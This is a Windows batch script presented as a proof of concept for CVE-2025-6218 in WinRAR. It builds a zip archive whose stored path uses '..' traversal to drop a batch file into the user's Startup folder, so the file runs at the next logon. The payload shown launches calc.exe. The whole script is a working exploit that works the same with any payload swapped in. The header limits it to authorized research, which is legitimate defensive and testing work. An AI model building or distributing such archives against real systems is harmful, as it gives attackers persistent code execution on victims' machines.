REM Authorized security research and testing only. @echo off title CVE-2025-6218 POC echo calc.exe > POC.bat :: Assumes that two directories up from the current working directory corresponds to the user's home directory (%USERPROFILE%) "C:\Program Files\WinRAR\WinRAR.exe" a -ap" \.. \.. \.. \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\" %~dp0CVE-2025-6218.zip POC.bat echo. if errorlevel 1 ( echo [!] Failed to create POC. ) else ( echo [+] CVE-2025-6218.zip created successfully! ) echo. del POC.bat pause